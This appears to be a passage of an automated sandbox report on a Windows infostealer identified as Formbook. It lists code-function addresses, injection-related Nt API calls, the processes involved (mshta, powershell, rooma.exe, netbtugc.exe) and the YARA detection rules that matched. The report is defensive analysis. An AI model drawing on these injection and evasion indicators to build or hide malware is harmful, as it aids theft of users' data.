          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02F22D30 NtUnmapViewOfSection,LdrInitializeThunk,10_2_02F22D30
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02F22D10 NtMapViewOfSection,LdrInitializeThunk,10_2_02F22D10
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02F23090 NtSetValueKey,10_2_02F23090
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02F23010 NtOpenDirectoryObject,10_2_02F23010
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02F22AB0 NtWaitForSingleObject,10_2_02F22AB0
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02F22B80 NtQueryInformationFile,10_2_02F22B80
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02F22EA0 NtAdjustPrivilegesToken,10_2_02F22EA0
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02F22E30 NtWriteVirtualMemory,10_2_02F22E30
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02F22FA0 NtQuerySection,10_2_02F22FA0
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02F22F90 NtProtectVirtualMemory,10_2_02F22F90
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02F22F60 NtCreateProcessEx,10_2_02F22F60
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02F22CF0 NtOpenProcess,10_2_02F22CF0
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02F22CC0 NtQueryVirtualMemory,10_2_02F22CC0
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02F22C00 NtQueryInformationProcess,10_2_02F22C00
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02F22DB0 NtEnumerateKey,10_2_02F22DB0
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02F23D70 NtOpenThread,10_2_02F23D70
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02F23D10 NtOpenProcessToken,10_2_02F23D10
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02F22D00 NtSetInformationFile,10_2_02F22D00
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02577A70 NtReadFile,10_2_02577A70
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02577B50 NtDeleteFile,10_2_02577B50
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02577BE0 NtClose,10_2_02577BE0
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02577920 NtCreateFile,10_2_02577920
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02577D30 NtAllocateVirtualMemory,10_2_02577D30
          Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFB4A34217E5_2_00007FFB4A34217E
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_009B28A07_2_009B28A0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_009C68717_2_009C6871
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_009C68737_2_009C6873
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_009BE1F37_2_009BE1F3
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_009B11107_2_009B1110
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_009C01737_2_009C0173
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_009B12907_2_009B1290
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_009B35007_2_009B3500
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_009B26987_2_009B2698
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_009B268A7_2_009B268A
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_009B26A07_2_009B26A0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_009BFF537_2_009BFF53
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_009DD7537_2_009DD753
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_009BFF4A7_2_009BFF4A
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0166B16B7_2_0166B16B
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0158F1727_2_0158F172
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015D516C7_2_015D516C
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015901007_2_01590100
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0163A1187_2_0163A118
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_016581CC7_2_016581CC
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_016601AA7_2_016601AA
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015AB1B07_2_015AB1B0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0165F0E07_2_0165F0E0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_016570E97_2_016570E9
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015A70C07_2_015A70C0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0164F0CC7_2_0164F0CC
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0158D34C7_2_0158D34C
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0165A3527_2_0165A352
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0165132D7_2_0165132D
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_016603E67_2_016603E6
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015AE3F07_2_015AE3F0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015E739A7_2_015E739A
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_016402747_2_01640274
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_016412ED7_2_016412ED
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015BB2C07_2_015BB2C0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015A52A07_2_015A52A0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_016575717_2_01657571
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015A05357_2_015A0535
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0163D5B07_2_0163D5B0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_016605917_2_01660591
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_016524467_2_01652446
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015914607_2_01591460
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0165F43F7_2_0165F43F
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0164E4F67_2_0164E4F6
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015C47507_2_015C4750
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015A07707_2_015A0770
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0159C7C07_2_0159C7C0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0165F7B07_2_0165F7B0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_016516CC7_2_016516CC
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015BC6E07_2_015BC6E0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015A99507_2_015A9950
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015BB9507_2_015BB950
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015B69627_2_015B6962
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0166A9A67_2_0166A9A6
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015A29A07_2_015A29A0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015A28407_2_015A2840
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015AA8407_2_015AA840
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0160D8007_2_0160D800
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015CE8F07_2_015CE8F0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015A38E07_2_015A38E0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015868B87_2_015868B8
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0165FB767_2_0165FB76
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0165AB407_2_0165AB40
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015DDBF97_2_015DDBF9
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_01656BD77_2_01656BD7
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015BFB807_2_015BFB80
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_01613A6C7_2_01613A6C
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_01657A467_2_01657A46
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0165FA497_2_0165FA49
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0164DAC67_2_0164DAC6
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0163DAAC7_2_0163DAAC
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0159EA807_2_0159EA80
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015E5AA07_2_015E5AA0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_01657D737_2_01657D73
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015A3D407_2_015A3D40
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_01651D5A7_2_01651D5A
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015AAD007_2_015AAD00
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015BFDC07_2_015BFDC0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0159ADE07_2_0159ADE0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015B8DBF7_2_015B8DBF
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_01619C327_2_01619C32
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015A0C007_2_015A0C00
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0165FCF27_2_0165FCF2
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_01590CF27_2_01590CF2
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_01640CB57_2_01640CB5
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_01614F407_2_01614F40
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0165FF097_2_0165FF09
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015C0F307_2_015C0F30
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015E2F287_2_015E2F28
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_01592FC87_2_01592FC8
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015ACFE07_2_015ACFE0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015A1F927_2_015A1F92
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0165FFB17_2_0165FFB1
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015A0E597_2_015A0E59
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0165EE267_2_0165EE26
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0165EEDB7_2_0165EEDB
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015B2E907_2_015B2E90
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_015A9EB07_2_015A9EB0
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: 7_2_0165CE937_2_0165CE93
          Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exeCode function: 9_2_04AF2CAF9_2_04AF2CAF
          Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exeCode function: 9_2_04AD54AF9_2_04AD54AF
          Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exeCode function: 9_2_04AD54A69_2_04AD54A6
          Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exeCode function: 9_2_04ADBDCD9_2_04ADBDCD
          Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exeCode function: 9_2_04ADBDCF9_2_04ADBDCF
          Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exeCode function: 9_2_04AD56CF9_2_04AD56CF
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02F912ED10_2_02F912ED
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02F0B2C010_2_02F0B2C0
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02EF52A010_2_02EF52A0
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02F9027410_2_02F90274
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02FB03E610_2_02FB03E6
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02EFE3F010_2_02EFE3F0
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02F3739A10_2_02F3739A
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02EDD34C10_2_02EDD34C
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02FAA35210_2_02FAA352
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02FA132D10_2_02FA132D
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02FA70E910_2_02FA70E9
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02FAF0E010_2_02FAF0E0
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02EF70C010_2_02EF70C0
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02F9F0CC10_2_02F9F0CC
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02FA81CC10_2_02FA81CC
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02FB01AA10_2_02FB01AA
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02EFB1B010_2_02EFB1B0
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02FBB16B10_2_02FBB16B
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02F2516C10_2_02F2516C
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02EDF17210_2_02EDF172
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02F8A11810_2_02F8A118
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02EE010010_2_02EE0100
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02F0C6E010_2_02F0C6E0
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02FA16CC10_2_02FA16CC
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02EEC7C010_2_02EEC7C0
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02FAF7B010_2_02FAF7B0
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02EF077010_2_02EF0770
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02F1475010_2_02F14750
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02F9E4F610_2_02F9E4F6
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02EE146010_2_02EE1460
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02FA244610_2_02FA2446
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02FAF43F10_2_02FAF43F
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02F8D5B010_2_02F8D5B0
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02FB059110_2_02FB0591
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02FA757110_2_02FA7571
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02EF053510_2_02EF0535
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02F9DAC610_2_02F9DAC6
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02F35AA010_2_02F35AA0
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02F8DAAC10_2_02F8DAAC
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02EEEA8010_2_02EEEA80
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02F63A6C10_2_02F63A6C
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02FAFA4910_2_02FAFA49
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02FA7A4610_2_02FA7A46
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02F2DBF910_2_02F2DBF9
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02FA6BD710_2_02FA6BD7
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02F0FB8010_2_02F0FB80
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02FAFB7610_2_02FAFB76
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02FAAB4010_2_02FAAB40
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02F1E8F010_2_02F1E8F0
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02EF38E010_2_02EF38E0
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02ED68B810_2_02ED68B8
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02EF284010_2_02EF2840
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02EFA84010_2_02EFA840
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02EF29A010_2_02EF29A0
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02FBA9A610_2_02FBA9A6
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02F0696210_2_02F06962
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02F0B95010_2_02F0B950
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02EF995010_2_02EF9950
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02FAEEDB10_2_02FAEEDB
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02EF9EB010_2_02EF9EB0
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02F02E9010_2_02F02E90
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02FACE9310_2_02FACE93
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02EF0E5910_2_02EF0E59
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02FAEE2610_2_02FAEE26
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02EFCFE010_2_02EFCFE0
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02EE2FC810_2_02EE2FC8
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02FAFFB110_2_02FAFFB1
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02EF1F9210_2_02EF1F92
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02F64F4010_2_02F64F40
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02F10F3010_2_02F10F30
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02F32F2810_2_02F32F28
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02FAFF0910_2_02FAFF09
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02FAFCF210_2_02FAFCF2
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02EE0CF210_2_02EE0CF2
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02F90CB510_2_02F90CB5
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02F69C3210_2_02F69C32
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02EF0C0010_2_02EF0C00
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02EEADE010_2_02EEADE0
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02F0FDC010_2_02F0FDC0
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02F08DBF10_2_02F08DBF
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02FA7D7310_2_02FA7D73
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02FA1D5A10_2_02FA1D5A
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02EF3D4010_2_02EF3D40
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02EFAD0010_2_02EFAD00
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_025615E010_2_025615E0
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_025630F010_2_025630F0
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_025630EE10_2_025630EE
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_0255C7D010_2_0255C7D0
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_0255C7C710_2_0255C7C7
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_0255AA7010_2_0255AA70
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_0255C9F010_2_0255C9F0
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02579FD010_2_02579FD0
          Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exeCode function: 14_2_023AF28A14_2_023AF28A
          Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exeCode function: 14_2_023CCA8A14_2_023CCA8A
          Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exeCode function: 14_2_023AF28114_2_023AF281
          Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exeCode function: 14_2_023B5BAA14_2_023B5BAA
          Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exeCode function: 14_2_023B5BA814_2_023B5BA8
          Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exeCode function: 14_2_023B409A14_2_023B409A
          Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exeCode function: 14_2_023AF4AA14_2_023AF4AA
          Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exeCode function: 14_2_023AD52A14_2_023AD52A
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: String function: 0160EA12 appears 86 times
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: String function: 0158B970 appears 268 times
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: String function: 015E7E54 appears 89 times
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: String function: 015D5130 appears 36 times
          Source: C:\Users\user\AppData\Roaming\rooma.exeCode function: String function: 0161F290 appears 105 times
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 02F37E54 appears 88 times
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 02EDB970 appears 266 times
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 02F5EA12 appears 84 times
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 02F6F290 appears 105 times
          Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 02F25130 appears 36 times
          Source: rooma.exe.5.drStatic PE information: No import functions for PE file found
          Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
          Source: 7.2.rooma.exe.9b0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000A.00000002.3833199808.0000000002550000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000A.00000002.3836687746.0000000002C10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000007.00000002.1603904301.00000000009B1000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000007.00000002.1604384036.00000000014C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
